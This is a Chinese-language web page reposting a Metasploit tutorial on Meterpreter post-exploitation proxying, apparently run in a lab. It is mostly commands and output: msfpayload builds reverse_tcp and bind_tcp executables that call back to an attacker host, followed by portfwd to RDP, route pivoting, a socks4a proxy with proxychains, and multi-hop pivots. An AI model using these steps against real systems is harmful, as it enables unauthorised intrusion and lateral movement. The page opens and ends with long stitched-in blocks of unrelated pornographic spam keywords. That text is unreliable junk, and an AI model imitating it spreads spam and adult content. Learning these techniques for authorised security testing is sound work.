精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Metasploit滲透技巧:后滲透Meterpreter代理

安全 黑客攻防
Metasploit是一個免費的、可下載的滲透測試框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊測試。它本身附帶數百個已知軟件漏洞的專業(yè)級漏洞攻擊測試工具。

Metasploit是一個免費的、可下載的滲透測試框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊測試。它本身附帶數百個已知軟件漏洞的專業(yè)級漏洞攻擊測試工具。

當H.D. Moore在2003年發(fā)布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來測試那些未打過補丁或者剛剛打過補丁的漏洞。

正是因為Metasploit團隊一直都在努力開發(fā)各種攻擊測試工具,并將它們貢獻給所有Metasploit用戶,軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補丁了。

本文將科普下metasploit隧道代理的使用技巧。

0×00 獲取meterpreter

1.首先生成可執(zhí)行文件

  1. root@kali:~# msfpayload windows/meterpreter/reverse_tcp  LHOST=192.168.101.105 LPORT=444 X > meter.exe  
  2. [!] ************************************************************************  
  3. [!] *               The utility msfpayload is deprecated!                  *  
  4. [!] *              It will be removed on or about 2015-06-08               *  
  5. [!] *                   Please use msfvenom instead                        *  
  6. [!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *  
  7. [!] ************************************************************************  
  8. Created by msfpayload (http://www.metasploit.com).  
  9. Payload: windows/meterpreter/reverse_tcp  
  10.  Length: 281  
  11. Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"} 

2.啟動msfconsole,監(jiān)聽反連端口

  1. root@kali:~# msfconsole  
  2. [*] Starting the Metasploit Framework console.../   
  3. Taking notes in notepad? Have Metasploit Pro track & report  
  4. your progress and findings -- learn more on http://rapid7.com/metasploit 
  5.        =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]  
  6. + -- --=[ 1386 exploits - 863 auxiliary - 236 post        ]  
  7. + -- --=[ 342 payloads - 37 encoders - 8 nops             ]  
  8. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]  
  9. msf > use exploit/multi/handler   
  10. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp  
  11. PAYLOAD => windows/meterpreter/reverse_tcp  
  12. msf exploit(handler) > set LHOST 0.0.0.0  
  13. LHOST => 0.0.0.0  
  14. msf exploit(handler) > set LPORT 444  
  15. LPORT => 444  
  16. msf exploit(handler) > show options   
  17. Module options (exploit/multi/handler):  
  18. Name  Current Setting  Required  Description  
  19.  ----  ---------------  --------  -----------  
  20. Payload options (windows/meterpreter/reverse_tcp):  
  21.    Name      Current Setting  Required  Description  
  22.    ----      ---------------  --------  -----------  
  23.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  24.    LHOST     0.0.0.0          yes       The listen address  
  25.    LPORT     444              yes       The listen port  
  26. Exploit target:  
  27.    Id  Name  
  28.    --  ----  
  29.    0   Wildcard Target  
  30. msf exploit(handler) > run   
  31. [*] Started reverse handler on 0.0.0.0:444   
  32. [*] Starting the payload handler... 

3.在xp-test1執(zhí)行meter.exe,attacker獲得meterperter

  1. msf exploit(handler) > run   
  2. [*] Started reverse handler on 0.0.0.0:444   
  3. [*] Starting the payload handler...  
  4. [*] Sending stage (770048 bytes) to 192.168.101.107  
  5. [*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800  
  6. meterpreter > ipconfig  
  7. Interface  1 
  8. ============  
  9. Name         : MS TCP Loopback interface  
  10. Hardware MAC : 00:00:00:00:00:00  
  11. MTU          : 1520  
  12. IPv4 Address : 127.0.0.1  
  13. Interface  2 
  14. ============  
  15. Name         : AMD PCNET Family PCI Ethernet Adapter - pencS  
  16. Hardware MAC : 00:0c:29:ed:cf:d0  
  17. MTU          : 1500  
  18. IPv4 Address : 10.1.1.128  
  19. IPv4 Netmask : 255.255.255.0 

#p#

0×01 meterpreter基本隧道代理

好,現在已經有一個反彈回來的權限,下面介紹meterpreter隧道代理的幾種方法

1.portfwd

portfwd 是meterpreter提供的一種基本的端口轉發(fā)。porfwd可以反彈單個端口到本地,并且監(jiān)聽.使用方法如下:

  1. meterpreter > portfwd   
  2. 0 total local port forwards.  
  3. meterpreter > portfwd  -h  
  4. Usage: portfwd [-h] [add | delete | list | flush] [args]  
  5. OPTIONS:  
  6.     -L <opt>  The local host to listen on (optional).  
  7.     -h        Help banner.  
  8.     -l <opt>  The local port to listen on.  
  9.     -p <opt>  The remote port to connect to.  
  10.     -r <opt>  The remote host to connect to. 

使用實例介紹:

反彈10.1.1.129端口3389到本地2222并監(jiān)聽那么可以使用如下方法:

  1. meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389  
  2. [*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389  
  3. meterpreter > portfwd   
  4. 0: 0.0.0.0:2222 -> 10.1.1.129:3389  
  5. 1 total local port forwards. 

已經轉發(fā)成功,下面來驗證下:

  1. root@kali:~# netstat -an | grep "2222"  
  2. tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN 

可以看到已經成功監(jiān)聽2222端口

接著連接本地2222端口即可連接受害機器10.1.1.129 3389端口,如下:

  1. root@kali:~# rdesktop 127.1.1.0:2222 

 

Metasploit滲透技巧:后滲透Meterpreter代理

 

可以看到,已經成功連接到10.1.1.129 的3389端口#p#

2. pivot

pivot是meterpreter最常用的一種代理,可以輕松把你的機器代理到受害者內網環(huán)境,下面介紹下pivot的搭建和使用方法

使用方法route add 目標i或ip段 Netmask 要使用代理的會話,通過實例來說明:

在metasploit添加一個路由表,目的是訪問10.1.1.129將通過meterpreter的會話 1 來訪問:

  1. msf exploit(handler) > route add 10.1.1.129 255.255.255.255 1  
  2. [*] Route added  
  3. msf exploit(handler) > route print   
  4. Active Routing Table 
  5. ====================  
  6.    Subnet             Netmask            Gateway  
  7.    ------             -------            -------  
  8.    10.1.1.129         255.255.255.255    Session 1 

這里如果要代理10.1.1.129/24 到session 1,則可以這么寫

  1. route add 10.1.1.0 255.255.255.0 1 

到這里pivot已經配置好了,你在msf里對10.1.1.129進行掃描(db_nmap)或者訪問(psexe 模塊,ssh模塊等)將通過代理session 1這個會話來訪問。

如果想通過其他應用程序來使用這個代理怎么辦呢,這時候可以借助 metasploit socks4a提供一個監(jiān)聽隧道供其他應用程序訪問:

首先使用 socks4a并且配置,監(jiān)聽端口

  1. msf exploit(handler) > use auxiliary/server/socks4a   
  2. msf auxiliary(socks4a) > show options   
  3. Module options (auxiliary/server/socks4a):  
  4.    Name     Current Setting  Required  Description  
  5.    ----     ---------------  --------  -----------  
  6.    SRVHOST  0.0.0.0          yes       The address to listen on  
  7.    SRVPORT  1080             yes       The port to listen on.  
  8. Auxiliary action:  
  9.    Name   Description  
  10.    ----   -----------  
  11.    Proxy    
  12. msf auxiliary(socks4a) > exploit -y  
  13. [*] Auxiliary module execution completed  
  14. msf auxiliary(socks4a) >   
  15. [*] Starting the socks4a proxy server 

查看監(jiān)聽端口

  1. root@kali:~# netstat -an | grep "1080"  
  2. tcp        0      0 0.0.0.0:1080            0.0.0.0:*               LISTEN 

端口已經監(jiān)聽,接著配置 proxychains

  1. root@kali:~# vim /etc/proxychains.conf  
  2. [ProxyList]  
  3. # add proxy here ...  
  4. # meanwileroot@kali:~# netstat -an | grep "1080"  
  5. tcp        0      0 0.0.0.0:1080            0.0.0.0:*               LISTEN   
  6. # defaults set to "tor"  
  7. socks4  127.0.0.1 1080 

配置好以后看看使用 proxychains進行代理訪問,這里訪問10.1.1.129 3389端口

Metasploit滲透技巧:后滲透Meterpreter代理

可以看到已經成功訪問#p#

0×02 多級代理

1. 二級代理隧道

上面介紹了meterpreter基礎的代理方法,但是有些實際環(huán)境不能直接使用,考慮如下環(huán)境(內網機器A、B。A機器可以對外連接,但是訪問控制很嚴格,只能訪問到很少的內網機器,B機器不能對外連接,但是可以訪問到很多核心服務和機器,A、B之間可以互相訪問),如果我們想通過B機器對核心服務和機器進行掃描和訪問要怎么辦呢?

這時候我們就meterpreter的pivot組合輕松實現二級代理就可以

效果示意圖:attacker->xp-test1->xp-test2

首先接著上面,我們已經有一個xp-test1反彈回來的meterprter了,接著我們生成一個正向的執(zhí)行文件

  1. root@kali:~# msfpayload windows/meterpreter/bind_tcp  RHOST=0.0.0.0 RPORT=4444 X > Rmeter.exe  
  2. [!] ************************************************************************  
  3. [!] *               The utility msfpayload is deprecated!                  *  
  4. [!] *              It will be removed on or about 2015-06-08               *  
  5. [!] *                   Please use msfvenom instead                        *  
  6. [!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *  
  7. [!] ************************************************************************  
  8. Created by msfpayload (http://www.metasploit.com).  
  9. Payload: windows/meterpreter/bind_tcp  
  10.  Length: 285  
  11. Options: {"RHOST"=>"0.0.0.0", "RPORT"=>"4444"} 

生成好以后在xp-test2上面運行

接著在msf里面添加路由

  1. msf exploit(handler) > route add 10.1.1.129 255.255.255.255 2  
  2. [*] Route added  
  3. msf exploit(handler) > route  print  
  4. Active Routing Table 
  5. ====================  
  6.    Subnet             Netmask            Gateway  
  7.    ------             -------            -------  
  8.    10.1.1.129         255.255.255.255    Session 2 

連接正向 meterpreter獲取權限

  1. msf exploit(handler) > use exploit/multi/handler   
  2. msf exploit(handler) > set PAYLOAD windows//bind_tcp  
  3. PAYLOAD => windows/meterpreter/bind_tcp  
  4. msf exploit(handler) > set RHOST 10.1.1.129  
  5. RHOST => 10.1.1.129  
  6. msf exploit(handler) > show options   
  7. Module options (exploit/multi/handler):  
  8.    Name  Current Setting  Required  Description  
  9.    ----  ---------------  --------  -----------  
  10. Payload options (windows/meterpreter/bind_tcp):  
  11.    Name      Current Setting  Required  Description  
  12.    ----      ---------------  --------  -----------  
  13.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  14.    LPORT     444              yes       The listen port  
  15.    RHOST     10.1.1.129       no        The target address  
  16. Exploit target:  
  17.    Id  Name  
  18.    --  ----  
  19.    0   Wildcard Target  
  20. msf exploit(handler) > set LPORT 4444  
  21. LPORT => 4444  
  22. msf exploit(handler) > show options   
  23. Module options (exploit/multi/handler):  
  24.    Name  Current Setting  Required  Description  
  25.    ----  ---------------  --------  -----------  
  26. Payload options (windows/meterpreter/bind_tcp):  
  27.    Name      Current Setting  Required  Description  
  28.    ----      ---------------  --------  -----------  
  29.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  30.    LPORT     4444             yes       The listen port  
  31.    RHOST     10.1.1.129       no        The target address  
  32. Exploit target:  
  33.    Id  Name  
  34.    --  ----  
  35.    0   Wildcard Target  
  36. msf exploit(handler) > run   
  37. [*] Started bind handler  
  38. [*] Starting the payload handler...  
  39. [*] Sending stage (770048 bytes)  
  40. [*] Meterpreter session 3 opened (192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444) at 2015-01-11 13:34:37 +0800 

現在已經獲取到xp-test2的權限,注意這里是通過xp-test1 pivot代理

下面來驗證下,查看xp-test2 4444端口

  1. C:\Documents and Settings\Administrator>netstat -an | find "4444"  
  2.   TCP    10.1.1.129:4444        10.1.1.128:1051        ESTABLISHED 

是通過xp-test1進行連接的。

這時候二級代理已經搭建好了,你可以添加需要訪問的ip到路由表,通過第二層的session(session 3),就可以使用metaploit的其他模塊訪問或掃描了。#p#

2.三級或多級代理

有時候過于龐大或者復雜的內網環(huán)境,甚至需要三層或者多層代理,原理與兩層相似,通過在第二層代理的基礎上進行連接既可

示意圖:attacket->xp-test1->xp-test2->xp-test3->…..

與兩層代理類似,如下實現:

  1. msf exploit(handler) > sessions -l  
  2. Active sessions 
  3. ===============  
  4.   Id  Type                   Information                        Connection  
  5.   --  ----                   -----------                        ----------  
  6.   2   meterpreter x86/win32  XP-TEST1\Administrator @ XP-TEST1  192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)  
  7.   4   meterpreter x86/win32  XP-TEST2\Administrator @ XP-TEST2  192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)  
  8. msf exploit(handler) > route  add 10.1.1.131 4  
  9. [-] Missing arguments to route add.  
  10. msf exploit(handler) > route  add 10.1.1.131 255.255.255.255 4  
  11. [*] Route added  
  12. msf exploit(handler) > route print   
  13. Active Routing Table 
  14. ====================  
  15.    Subnet             Netmask            Gateway  
  16.    ------             -------            -------  
  17.    10.1.1.129         255.255.255.255    Session 2  
  18.    10.1.1.131         255.255.255.255    Session 4  
  19. msf exploit(handler) > set RHOST=10.1.1.131  
  20. [-] Unknown variable  
  21. Usage: set [option] [value]  
  22. Set the given option to value.  If value is omitted, print the current value.  
  23. If both are omitted, print options that are currently set.  
  24. If run from a module context, this will set the value in the module&#039;s  
  25. datastore.  Use -g to operate on the global datastore  
  26. msf exploit(handler) > set RHOST 10.1.1.131  
  27. RHOST => 10.1.1.131  
  28. msf exploit(handler) > show options   
  29. Module options (exploit/multi/handler):  
  30.    Name  Current Setting  Required  Description  
  31.    ----  ---------------  --------  -----------  
  32. Payload options (windows/meterpreter/bind_tcp):  
  33.    Name      Current Setting  Required  Description  
  34.    ----      ---------------  --------  -----------  
  35.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  36.    LPORT     4444             yes       The listen port  
  37.    RHOST     10.1.1.131       no        The target address  
  38. Exploit target:  
  39.    Id  Name  
  40.    --  ----  
  41.    0   Wildcard Target  
  42. msf exploit(handler) > run   
  43. [*] Started bind handler  
  44. [*] Starting the payload handler...  
  45. [*] Sending stage (770048 bytes)  
  46. [*] Meterpreter session 5 opened (192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444) at 2015-01-11 13:45:53 +0800  
  47. meterpreter > background   
  48. [*] Backgrounding session 5...  
  49. msf exploit(handler) > sessions -l  
  50. Active sessions 
  51. ===============  
  52.   Id  Type                   Information                        Connection  
  53.   --  ----                   -----------                        ----------  
  54.   2   meterpreter x86/win32  XP-TEST1\Administrator @ XP-TEST1  192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)  
  55.   4   meterpreter x86/win32  XP-TEST2\Administrator @ XP-TEST2  192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)  
  56.   5   meterpreter x86/win32  XP-TEST3\Administrator @ XP-TEST3  192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444 (10.1.1.131)  
  57. 在xp-test3查看端口連接  
  58. C:\Documents and Settings\Administrator>netstat -an | find "4444"  
  59.   TCP    10.1.1.131:4444        10.1.1.129:1032        ESTABLISHED  
  60. 在xp-test2查看4444端口  
  61. C:\Documents and Settings\Administrator>netstat -an | find "4444"  
  62.   TCP    10.1.1.129:1032        10.1.1.131:4444        ESTABLISHED  
  63.   TCP    10.1.1.129:4444        10.1.1.128:1054        ESTABLISHED  
  64. 說明已經實現三級連接,即attacker->xp-test1->xp-test2->xp-test3 

0×03 總結

最后,代理級數越多,帶寬損耗和穩(wěn)定性就會下降。滲透過程中根據實際情況自由靈活的選擇和使用代理方式才能實現事半工倍的效果。

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2013-11-06 16:38:59

2014-07-01 10:09:01

2014-11-26 09:15:20

2010-12-27 09:19:23

2014-06-09 14:18:24

2018-10-21 08:14:49

2014-06-11 10:29:03

2022-09-16 10:00:31

端口服務器

2013-04-12 13:21:44

2013-04-18 17:07:36

2018-09-17 09:03:47

WindowsToken滲透

2016-03-30 09:58:16

2014-05-30 09:41:16

2016-03-22 10:14:25

域滲透滲透測試域控權限

2017-07-24 17:00:49

2016-09-09 01:14:17

2010-08-03 22:09:16

2021-07-15 10:46:21

滲透測試網絡安全網絡攻擊

2022-03-08 14:23:38

APIWeb前端

2013-08-21 16:15:15

點贊
收藏

51CTO技術棧公眾號

免费观看日韩电影| 猛男gaygay欧美视频| 亚洲黄色小视频| 不卡一区二区三区四区五区| 日本少妇久久久| 欧美精品momsxxx| 欧美日韩国产经典色站一区二区三区| 国产亚洲精品久久久久久久| 五月天婷婷在线观看| 日韩成人一级大片| 久久99热精品| 在线免费观看视频| 91精品入口| 在线观看一区二区视频| 免费cad大片在线观看| 男人天堂网在线| 国产在线国偷精品免费看| 国外成人免费在线播放| 手机看片国产日韩| 日韩av影院| 6080午夜不卡| 欧美成人黑人猛交| 男女在线观看视频| 国产精品久久久久7777按摩| 精品九九九九| www.99视频| 美女一区二区三区在线观看| 69视频在线免费观看| 黑鬼狂亚洲人videos| 精品视频日韩| 日韩av网址在线观看| 91精品视频国产| 欧美最新精品| 天天操天天舔天天干| 国产精品任我爽爆在线播放| 欧美久久婷婷综合色| 久久国产成人精品国产成人亚洲| 成人午夜在线影视| 国产精品欧美精品| 免费国产在线精品一区二区三区| 国产叼嘿视频在线观看| 久久成人精品无人区| 日韩美女在线观看一区| 欧美不卡视频在线观看| 欧美日韩国产综合网| 久久久国产精品亚洲一区| 欧美 日韩 成人| 亚洲毛片免费看| 亚洲国产精品久久精品怡红院| 一级片黄色免费| 一区二区三区| 欧美精品自拍偷拍| 岛国av在线免费| 国产欧美自拍| 欧美日韩国产在线观看| 天天爽人人爽夜夜爽| 久久精品女人天堂av免费观看 | 国产精品乱子乱xxxx| 黄色大片中文字幕| 少妇太紧太爽又黄又硬又爽小说| 久久97久久97精品免视看秋霞| 日韩你懂的在线观看| 日本少妇一区二区三区| 美国十次综合久久| 欧美不卡123| 亚洲天堂av网站| 欧美日韩一本| 亚洲欧美制服中文字幕| 亚洲精品国产一区黑色丝袜| 欧美人与牛zoz0性行为| 国产一区二区三区丝袜| av片在线免费看| 亚洲欧美网站在线观看| 欧美成人精品在线观看| 久久伊人成人网| 亚洲精品人人| 日韩av免费一区| 怡红院成永久免费人全部视频| 蜜臀av亚洲一区中文字幕| 91九色单男在线观看| www香蕉视频| 96av麻豆蜜桃一区二区| 亚洲春色在线| 182tv在线播放| 免费一级欧美在线观看视频| 国产日韩欧美麻豆| 亚洲精品国产精品久久| 1区2区在线观看| 婷婷综合另类小说色区| 激情内射人妻1区2区3区| 青草综合视频| 亚洲国产美女精品久久久久∴| 蜜桃精品一区二区| 97欧美在线视频| 久久久人成影片一区二区三区| 黑人精品无码一区二区三区AV| 久久精品国产**网站演员| 爱情岛论坛亚洲入口| 蜜桃免费在线| 亚洲男女一区二区三区| av免费观看网| 国产999精品在线观看| 日韩精品黄色网| 成人做爰69片免网站| 亚洲午夜伦理| 国产精品视频yy9099| а√天堂资源在线| 久久精品欧美一区二区三区麻豆| 亚洲高潮无码久久| 日韩电影大全网站| 欧美大片一区二区| 国产1区2区在线观看| 激情综合在线| 国产一区深夜福利| 免费在线黄色网址| 亚洲韩国一区二区三区| 三级av免费观看| 天海翼亚洲一区二区三区| 日韩有码在线视频| 免费无码国产精品| 99热国产精品| 欧美交换配乱吟粗大25p| 欧美日一区二区三区| 亚洲精品动漫100p| 国产欧美日韩高清| 日韩av电影网| 国产在线精品免费| 欧美中日韩免费视频| 国产在线88av| 精品国产亚洲一区二区三区在线观看| 91香蕉视频污在线观看| 日韩成人伦理电影在线观看| 精品国产综合区久久久久久| 爱看av在线| 欧美www视频| 加勒比婷婷色综合久久| 精品一区二区在线免费观看| 日韩成人在线资源| 中文字幕21页在线看| 精品少妇一区二区三区在线播放 | 亚洲区小说区图片区qvod按摩| 欧美精品情趣视频| 国产一区二区在线不卡| 国产精品成人免费在线| 午夜欧美福利视频| 精品国产乱码久久久久久蜜坠欲下 | 色欧美日韩亚洲| 国产精品1000部啪视频| 国产欧美日韩综合一区在线播放 | 欧美视频国产视频| 99久久九九| 成人国产精品久久久久久亚洲| 国产裸舞福利在线视频合集| 色老综合老女人久久久| 亚洲久久久久久久| 日韩av二区在线播放| 日韩欧美一区二区视频在线播放| 亚洲一区二区三区四区| 国产亚洲精品久久久| 波多野结衣在线观看视频| 国产欧美精品区一区二区三区| 欧美丰满熟妇xxxxx| 国产亚洲一卡2卡3卡4卡新区| 国产成人精品综合久久久| 高清毛片在线看| 欧美日韩午夜在线视频| 久久国产精品国语对白| 国产成人午夜精品5599| 久久视频这里有精品| 性欧美lx╳lx╳| 国产精品久久久久久久美男| 男女啪啪在线观看| 亚洲国产中文在线二区三区免| 欧美日韩久久久久久| 999精品在线视频| 国产 日韩 欧美大片| 欧美成人高潮一二区在线看| 蜜桃a∨噜噜一区二区三区| 国产精品一区二区在线| 亚洲妇熟xxxx妇色黄| 亚洲国产女人aaa毛片在线| 日韩久久中文字幕| 1区2区3区精品视频| 中文字幕天堂av| 久久久青草婷婷精品综合日韩| 亚洲一区二区三区免费观看| 在线观看视频一区二区三区| 欧美又大粗又爽又黄大片视频| 午夜毛片在线| 亚洲白拍色综合图区| 天天天天天天天干| 亚洲国产一区二区在线播放| 中文字幕成人动漫| 国产精品一二三四| 黑森林福利视频导航| 911精品美国片911久久久| 精品欧美国产| 国产精品久久久久久久久久辛辛 | 99视频超级精品| 亚洲一区日韩精品| 国产偷自视频区视频一区二区| 亚洲欧美日产图| 久久综合社区| 成人亚洲综合色就1024| 依依综合在线| 欧美日韩成人在线播放| 黄色大片在线看| 欧美成人激情免费网| 中文在线观看av| 天天综合网 天天综合色| 色欲一区二区三区精品a片| 97精品超碰一区二区三区| 午夜影院免费版| 奇米影视一区二区三区小说| 麻豆tv在线播放| 99欧美视频| 日韩精品欧美在线| 国产区精品视频在线观看豆花| 国产精品丝袜久久久久久高清| 爱草tv视频在线观看992| 久久伊人精品天天| 色综合久久久久综合一本到桃花网| 久久久久高清精品| 久久久久国产一区二区三区| 欧美亚洲日本| 亚洲成色999久久网站| 91影院在线播放| 色激情天天射综合网| 国产稀缺真实呦乱在线| 亚洲人成网站在线| 美女av免费看| 日本一区二区三级电影在线观看| 少妇户外露出[11p]| 不卡一区二区在线| 潘金莲一级淫片aaaaaaa| 久久av中文字幕片| 国产九九热视频| 日韩福利电影在线| 日韩av一二三四| 乱码第一页成人| 色综合久久久久无码专区| 精品91久久久久| 黄色三级中文字幕| 亚洲性感美女99在线| 日韩欧美一级在线| 欧美xxx在线观看| 少妇高潮大叫好爽喷水| 在线中文字幕亚洲| 日韩国产小视频| 欧美日韩影院| 野外做受又硬又粗又大视频√| 欧美jizzhd精品欧美巨大免费| 国产女主播av| 欧美精品偷拍| 丰满少妇久久久| 在线视频亚洲| 激情五月开心婷婷| 日产欧产美韩系列久久99| 91激情视频在线| 久久99精品国产91久久来源| 亚洲精品性视频| 国产成人av资源| 国产精品麻豆入口| 91首页免费视频| 日本一卡二卡在线播放| 国产精品久久久久久久久免费丝袜 | 国产欧美一级片| 日韩小视频在线观看专区| 亚洲高清在线观看视频| 亚洲国产一区二区三区四区| 你懂得在线网址| 日韩视频欧美视频| 女同视频在线观看| 2019最新中文字幕| 成人h在线观看| 亚洲aⅴ日韩av电影在线观看| 6080亚洲理论片在线观看| 国产一区二区三区无遮挡 | 亚洲欧洲日韩女同| 91精品人妻一区二区三区蜜桃欧美| 久久久久久久电影| 日韩av网站在线播放| 亚洲精品成人少妇| 天堂网av手机版| 欧美日韩一区二区不卡| 丰满熟妇乱又伦| 亚洲香蕉在线观看| 最爽无遮挡行房视频在线| 欧美性做爰毛片| www999久久| 免费看国产精品一二区视频| 围产精品久久久久久久| 国产老熟妇精品观看| 麻豆视频观看网址久久| 深田咏美中文字幕| 国产精品对白交换视频| 国产成人无码一区二区三区在线 | 91成人一区二区三区| 亚洲第一男人av| a黄色在线观看| 国自产精品手机在线观看视频| 成人福利片在线| 久久久久久久久久久一区| 亚洲最大黄网| 中文字幕在线观看第三页| 成人av电影免费在线播放| 貂蝉被到爽流白浆在线观看| 黄网站色欧美视频| 国产黄a三级三级三级| 亚洲色图综合久久| av午夜在线观看| 91精品免费视频| 精品免费av| 国产av麻豆mag剧集| 国产一区二区在线观看视频| a天堂中文字幕| 亚洲大型综合色站| 国产口爆吞精一区二区| 亚洲视频在线看| 麻豆理论在线观看| av电影成人| 影音先锋日韩精品| 日本a√在线观看| 2024国产精品| 日本少妇bbwbbw精品| 欧美成人免费网站| fc2ppv国产精品久久| 国产免费一区二区三区在线观看| 蜜臀91精品国产高清在线观看| 无码 制服 丝袜 国产 另类| 国产在线乱码一区二区三区| 国产精品18在线| 欧美色手机在线观看| 韩日在线视频| 日本亚洲欧美成人| 免费看日本一区二区| 国产精品无码人妻一区二区在线| 国产不卡视频在线观看| 欧美特黄一级片| 欧美精品xxxxbbbb| 国产色在线观看| 亚洲一区二区中文| 66国产精品| 亚洲一级片免费观看| 亚洲欧美日韩国产成人精品影院| 91一区二区视频| 久久在线免费观看视频| 高清久久一区| 欧美xxxx综合视频| www.国产高清| 精品国产乱码久久久久久1区2区| 伊人影院在线视频| 国产二区一区| 激情欧美日韩一区| 日本一级片在线播放| 精品电影在线观看| 蜜芽tv福利在线视频| 国产精品久久久久久av下载红粉 | 草草草视频在线观看| 国产成人亚洲综合a∨猫咪| 久久午夜鲁丝片午夜精品| 欧美精品一区二区三区视频| 松下纱荣子在线观看| 欧美成人在线免费观看| 日本伊人午夜精品| 中国一级片在线观看| 精品国产免费视频| 中文字幕在线官网| 亚洲欧美日韩精品综合在线观看| 久久er99热精品一区二区| 激情综合网五月天| 亚洲另类图片色| 国内欧美日韩| 国产成人亚洲综合无码| 成人福利电影精品一区二区在线观看| 日本天堂网在线| 中文字幕一区日韩电影| 秋霞午夜一区二区三区视频| 日韩av一二三四区| 国产精品你懂的在线| 亚洲精品国产suv一区| 欧美亚洲另类视频| 欧美激情黄色片| 免费看毛片的网站| 在线观看视频一区二区欧美日韩| а√中文在线8| 久久伊人一区二区| 精品一区二区av| 黄网在线观看视频| 久久精品91久久久久久再现| 国产三级精品三级在线观看国产| 黄色精品一区二区| 天堂在线一二区| 91精品在线影院| 久久综合图片| 久草视频精品在线| 一区二区三区视频免费| 亚洲免费一区三区| 亚洲欧美日韩一级| 精品久久久久久|